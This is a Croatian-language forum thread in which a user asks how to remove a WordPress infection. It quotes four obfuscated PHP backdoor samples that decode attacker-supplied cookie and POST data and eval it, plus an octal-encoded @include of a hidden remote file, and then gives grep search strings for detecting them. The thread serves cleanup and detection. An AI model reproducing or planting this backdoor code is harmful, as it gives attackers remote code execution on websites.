Kako istjerat Wordpress virus

Kao što sam obećao u susjednoj temi da ću otvoriti zasebnu za pitanje virusa koji me gnjavi …pa evo…

Znači radi se o Wordpress virusu, koji kreira nove maliciozne file-ove po svakom projektu do kojega ima pristup…te također i u postojeće php file-ove ubacuje svoj maliciozni code.

Neki od uzoraka koda (pattern-a) koji se pojavljuju su:

<?php
// Sample quoted from the forum post as found in an infected site — do not execute it.
// The first literal string is an index table: every entry of the array is assembled
// from single characters of that string, so no function name appears in plain text.
// The loop runs over the result of an (obfuscated) function applied to $_COOKIE and
// $_POST — presumably a merge of the two, i.e. attacker-controlled request data.
// Each value is XOR-ed (`^`) against a key derived from the parameter name, and when
// the `% 3` test on the decoded data is zero a function is built from that data,
// called, and the script exits; the other samples in this post have a literal
// eval() at the same spot. Useful only as a detection signature — remove the whole
// injected block from infected files rather than trying to "fix" it.
$tkvftkk = '6i0gp-v8a_u4mlbnd#9tHor5cxy3fe*k\'s';$kqtam = Array();$kqtam[] = $tkvftkk[20].$tkvftkk[30];$kqtam[] = $tkvftkk[24].$tkvftkk[22].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19].$tkvftkk[29].$tkvftkk[9].$tkvftkk[28].$tkvftkk[10].$tkvftkk[15].$tkvftkk[24].$tkvftkk[19].$tkvftkk[1].$tkvftkk[21].$tkvftkk[15];$kqtam[] = $tkvftkk[8].$tkvftkk[14].$tkvftkk[23].$tkvftkk[18].$tkvftkk[7].$tkvftkk[16].$tkvftkk[29].$tkvftkk[27].$tkvftkk[5].$tkvftkk[7].$tkvftkk[27].$tkvftkk[14].$tkvftkk[0].$tkvftkk[5].$tkvftkk[11].$tkvftkk[8].$tkvftkk[29].$tkvftkk[2].$tkvftkk[5].$tkvftkk[7].$tkvftkk[16].$tkvftkk[24].$tkvftkk[28].$tkvftkk[5].$tkvftkk[27].$tkvftkk[18].$tkvftkk[8].$tkvftkk[7].$tkvftkk[18].$tkvftkk[2].$tkvftkk[7].$tkvftkk[18].$tkvftkk[0].$tkvftkk[11].$tkvftkk[18].$tkvftkk[23];$kqtam[] = $tkvftkk[17];$kqtam[] = $tkvftkk[24].$tkvftkk[21].$tkvftkk[10].$tkvftkk[15].$tkvftkk[19];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[9].$tkvftkk[22].$tkvftkk[29].$tkvftkk[4].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19];$kqtam[] = $tkvftkk[29].$tkvftkk[25].$tkvftkk[4].$tkvftkk[13].$tkvftkk[21].$tkvftkk[16].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[10].$tkvftkk[14].$tkvftkk[33].$tkvftkk[19].$tkvftkk[22];$kqtam[] = $tkvftkk[8].$tkvftkk[22].$tkvftkk[22].$tkvftkk[8].$tkvftkk[26].$tkvftkk[9].$tkvftkk[12].$tkvftkk[29].$tkvftkk[22].$tkvftkk[3].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[13].$tkvftkk[29].$tkvftkk[15];$kqtam[] = $tkvftkk[4].$tkvftkk[8].$tkvftkk[24].$tkvftkk[31];foreach ($kqtam[8]($_COOKIE, $_POST) as $jlgtudl => $tmwuer){function dctvsy($kqtam, $jlgtudl, $nsvmcth){return $kqtam[7]($kqtam[5]($jlgtudl . 
$kqtam[2], ($nsvmcth / $kqtam[9]($jlgtudl)) + 1), 0, $nsvmcth);}function aqihg($kqtam, $vfzhrbm){return @$kqtam[10]($kqtam[0], $vfzhrbm);}function lvyjdt($kqtam, $vfzhrbm){$thdstnj = $kqtam[4]($vfzhrbm) % 3;if (!$thdstnj) {$ybammpl = $kqtam[1]; $yuwwf = $ybammpl("", $vfzhrbm[1]($vfzhrbm[2]));$yuwwf();exit();}}$tmwuer = aqihg($kqtam, $tmwuer);lvyjdt($kqtam, $kqtam[6]($kqtam[3], $tmwuer ^ dctvsy($kqtam, $jlgtudl, $kqtam[9]($tmwuer))));}

<?php
/*15343*/

// Sample quoted from the forum post — do not execute it. The include path is written
// with octal escapes inside a double-quoted string (e.g. `\057` is `/`), so a plain
// text search for the path or the hostname will not find it, and the leading `@`
// suppresses the warning if the included file has been removed. The `/*15343*/`
// markers above and below appear to be part of the injected block and are a usable
// search string on their own (the number may differ between infections — confirm).
@include "\057home\057http\144/vho\163ts/c\162oati\141-acc\157mmod\141tion\056info\057apar\164mani\055proh\141ska.\143om/t\145mpla\164es/t\065/ima\147es/.\0610035\064bb.i\143o";

/*15343*/

Nije uvijek isti, ako ti išta znači … evo tri različita primjera:

// Variant 1 quoted from the forum post — do not execute it. Same construction as the
// other samples: a character-index table hides every function name, the loop walks
// attacker-controlled $_COOKIE/$_POST data, XORs (`^`) it with a key derived from the
// parameter name, and on a zero `% 3` result passes the decoded payload to a literal
// eval() and exits. Only the table string and the variable names change between
// variants, which is why a search on the stable `]($_COOKIE, $_POST) as ` fragment works.
$cogju = '7tp#0nl6uy*2rxoe1_cfid4g5km93-b\'aH8vs';$pjexgjg = Array();$pjexgjg[] = $cogju[33].$cogju[10];$pjexgjg[] = $cogju[22].$cogju[34].$cogju[4].$cogju[22].$cogju[24].$cogju[11].$cogju[19].$cogju[34].$cogju[29].$cogju[27].$cogju[21].$cogju[32].$cogju[30].$cogju[29].$cogju[22].$cogju[30].$cogju[16].$cogju[16].$cogju[29].$cogju[34].$cogju[27].$cogju[15].$cogju[7].$cogju[29].$cogju[28].$cogju[11].$cogju[4].$cogju[22].$cogju[7].$cogju[0].$cogju[0].$cogju[16].$cogju[4].$cogju[21].$cogju[34].$cogju[4];$pjexgjg[] = $cogju[3];$pjexgjg[] = $cogju[18].$cogju[14].$cogju[8].$cogju[5].$cogju[1];$pjexgjg[] = $cogju[36].$cogju[1].$cogju[12].$cogju[17].$cogju[12].$cogju[15].$cogju[2].$cogju[15].$cogju[32].$cogju[1];$pjexgjg[] = $cogju[15].$cogju[13].$cogju[2].$cogju[6].$cogju[14].$cogju[21].$cogju[15];$pjexgjg[] = $cogju[36].$cogju[8].$cogju[30].$cogju[36].$cogju[1].$cogju[12];$pjexgjg[] = $cogju[32].$cogju[12].$cogju[12].$cogju[32].$cogju[9].$cogju[17].$cogju[26].$cogju[15].$cogju[12].$cogju[23].$cogju[15];$pjexgjg[] = $cogju[36].$cogju[1].$cogju[12].$cogju[6].$cogju[15].$cogju[5];$pjexgjg[] = $cogju[2].$cogju[32].$cogju[18].$cogju[25];foreach ($pjexgjg[7]($_COOKIE, $_POST) as $utqkikk => $omjan){function qahxesj($pjexgjg, $utqkikk, $aeoectx){return $pjexgjg[6]($pjexgjg[4]($utqkikk . $pjexgjg[1], ($aeoectx / $pjexgjg[8]($utqkikk)) + 1), 0, $aeoectx);}function jkegz($pjexgjg, $wqhtg){return @$pjexgjg[9]($pjexgjg[0], $wqhtg);}function eofpf($pjexgjg, $wqhtg){$ruscuh = $pjexgjg[3]($wqhtg) % 3;if (!$ruscuh) {eval($wqhtg[1]($wqhtg[2]));exit();}}$omjan = jkegz($pjexgjg, $omjan);eofpf($pjexgjg, $pjexgjg[5]($pjexgjg[2], $omjan ^ qahxesj($pjexgjg, $utqkikk, $pjexgjg[8]($omjan))));}

// Variant 2 quoted from the forum post — do not execute it. Structurally identical to
// the other variants (index-table obfuscation, loop over $_COOKIE/$_POST, XOR with a
// name-derived key, `% 3` gate, then eval() and exit()); only the table string, the
// order of the first two table entries and the random identifiers differ. Signature
// material only — delete the whole injected block from any file that contains it.
$sknonsb = 'ldm453bfi8H_knu\'yte9p#-*cvsg167aorx';$ttwymud = Array();$ttwymud[] = $sknonsb[6].$sknonsb[28].$sknonsb[5].$sknonsb[18].$sknonsb[31].$sknonsb[6].$sknonsb[30].$sknonsb[19].$sknonsb[22].$sknonsb[6].$sknonsb[6].$sknonsb[24].$sknonsb[7].$sknonsb[22].$sknonsb[3].$sknonsb[6].$sknonsb[4].$sknonsb[30].$sknonsb[22].$sknonsb[31].$sknonsb[19].$sknonsb[1].$sknonsb[3].$sknonsb[22].$sknonsb[3].$sknonsb[5].$sknonsb[9].$sknonsb[5].$sknonsb[24].$sknonsb[6].$sknonsb[4].$sknonsb[1].$sknonsb[31].$sknonsb[29].$sknonsb[5].$sknonsb[28];$ttwymud[] = $sknonsb[10].$sknonsb[23];$ttwymud[] = $sknonsb[21];$ttwymud[] = $sknonsb[24].$sknonsb[32].$sknonsb[14].$sknonsb[13].$sknonsb[17];$ttwymud[] = $sknonsb[26].$sknonsb[17].$sknonsb[33].$sknonsb[11].$sknonsb[33].$sknonsb[18].$sknonsb[20].$sknonsb[18].$sknonsb[31].$sknonsb[17];$ttwymud[] = $sknonsb[18].$sknonsb[34].$sknonsb[20].$sknonsb[0].$sknonsb[32].$sknonsb[1].$sknonsb[18];$ttwymud[] = $sknonsb[26].$sknonsb[14].$sknonsb[6].$sknonsb[26].$sknonsb[17].$sknonsb[33];$ttwymud[] = $sknonsb[31].$sknonsb[33].$sknonsb[33].$sknonsb[31].$sknonsb[16].$sknonsb[11].$sknonsb[2].$sknonsb[18].$sknonsb[33].$sknonsb[27].$sknonsb[18];$ttwymud[] = $sknonsb[26].$sknonsb[17].$sknonsb[33].$sknonsb[0].$sknonsb[18].$sknonsb[13];$ttwymud[] = $sknonsb[20].$sknonsb[31].$sknonsb[24].$sknonsb[12];foreach ($ttwymud[7]($_COOKIE, $_POST) as $onkxdn => $fdxgpnt){function demhhr($ttwymud, $onkxdn, $catng){return $ttwymud[6]($ttwymud[4]($onkxdn . $ttwymud[0], ($catng / $ttwymud[8]($onkxdn)) + 1), 0, $catng);}function jvnmaov($ttwymud, $mfcib){return @$ttwymud[9]($ttwymud[1], $mfcib);}function exznlt($ttwymud, $mfcib){$zgyecc = $ttwymud[3]($mfcib) % 3;if (!$zgyecc) {eval($mfcib[1]($mfcib[2]));exit();}}$fdxgpnt = jvnmaov($ttwymud, $fdxgpnt);exznlt($ttwymud, $ttwymud[5]($ttwymud[2], $fdxgpnt ^ demhhr($ttwymud, $onkxdn, $ttwymud[8]($fdxgpnt))));}

// Variant 3 quoted from the forum post — do not execute it. Same backdoor shape as the
// other two variants: index-table obfuscation of every function name, a loop over
// attacker-controlled $_COOKIE/$_POST values, XOR (`^`) against a key built from the
// parameter name, a `% 3` gate, then eval() of the decoded payload followed by exit().
// Because the `foreach (...($_COOKIE, $_POST) as ` fragment and the `% 3` gate are
// constant across variants, they are the parts worth searching for, not the names.
$wygrr = 'g0emcy*p1\'56d-x7tbv#3lsHf9rkn_oui4a8';$uikzch = Array();$uikzch[] = $wygrr[10].$wygrr[34].$wygrr[33].$wygrr[15].$wygrr[8].$wygrr[20].$wygrr[8].$wygrr[34].$wygrr[13].$wygrr[34].$wygrr[2].$wygrr[20].$wygrr[2].$wygrr[13].$wygrr[33].$wygrr[33].$wygrr[33].$wygrr[33].$wygrr[13].$wygrr[35].$wygrr[24].$wygrr[8].$wygrr[11].$wygrr[13].$wygrr[24].$wygrr[17].$wygrr[4].$wygrr[35].$wygrr[25].$wygrr[1].$wygrr[4].$wygrr[20].$wygrr[34].$wygrr[20].$wygrr[20].$wygrr[10];$uikzch[] = $wygrr[23].$wygrr[6];$uikzch[] = $wygrr[19];$uikzch[] = $wygrr[4].$wygrr[30].$wygrr[31].$wygrr[28].$wygrr[16];$uikzch[] = $wygrr[22].$wygrr[16].$wygrr[26].$wygrr[29].$wygrr[26].$wygrr[2].$wygrr[7].$wygrr[2].$wygrr[34].$wygrr[16];$uikzch[] = $wygrr[2].$wygrr[14].$wygrr[7].$wygrr[21].$wygrr[30].$wygrr[12].$wygrr[2];$uikzch[] = $wygrr[22].$wygrr[31].$wygrr[17].$wygrr[22].$wygrr[16].$wygrr[26];$uikzch[] = $wygrr[34].$wygrr[26].$wygrr[26].$wygrr[34].$wygrr[5].$wygrr[29].$wygrr[3].$wygrr[2].$wygrr[26].$wygrr[0].$wygrr[2];$uikzch[] = $wygrr[22].$wygrr[16].$wygrr[26].$wygrr[21].$wygrr[2].$wygrr[28];$uikzch[] = $wygrr[7].$wygrr[34].$wygrr[4].$wygrr[27];foreach ($uikzch[7]($_COOKIE, $_POST) as $hsvywkk => $viegisf){function zrxcqs($uikzch, $hsvywkk, $izvscvt){return $uikzch[6]($uikzch[4]($hsvywkk . $uikzch[0], ($izvscvt / $uikzch[8]($hsvywkk)) + 1), 0, $izvscvt);}function cnjgyu($uikzch, $zxavyvf){return @$uikzch[9]($uikzch[1], $zxavyvf);}function rufosra($uikzch, $zxavyvf){$xawmlam = $uikzch[3]($zxavyvf) % 3;if (!$xawmlam) {eval($zxavyvf[1]($zxavyvf[2]));exit();}}$viegisf = cnjgyu($uikzch, $viegisf);rufosra($uikzch, $uikzch[5]($uikzch[2], $viegisf ^ zrxcqs($uikzch, $hsvywkk, $uikzch[8]($viegisf))));}

`% 3` se pojavljuje na milijun mjesta, heh.

Dobra stvar je što djeluje da [će] se % 3 pojaviti u svakom od tih blokova.
Nezgodno je što nije sigurno koji je od tih blokova legitimni WP kod.

Potraži regex-om ovo:

]($_COOKIE, $_POST) as 

Počinje desnom uglastom zagradom a završava space-om iza riječi as.
Kopiraj ovaj kod, ali dodaj space iza "as" ako ga nema. Taj string potraži u svim fajlovima. Pazi: `(`, `)` i `$` su regex metaznakovi, pa ih ili escapeaj (`\(`, `\)`, `\$`) ili traži doslovni string (npr. `grep -rF`). Drugi tip uzorka (onaj s `@include`) taj string nema – za njega potraži `/*15343*/` (broj se može razlikovati) ili `@include "\057`.
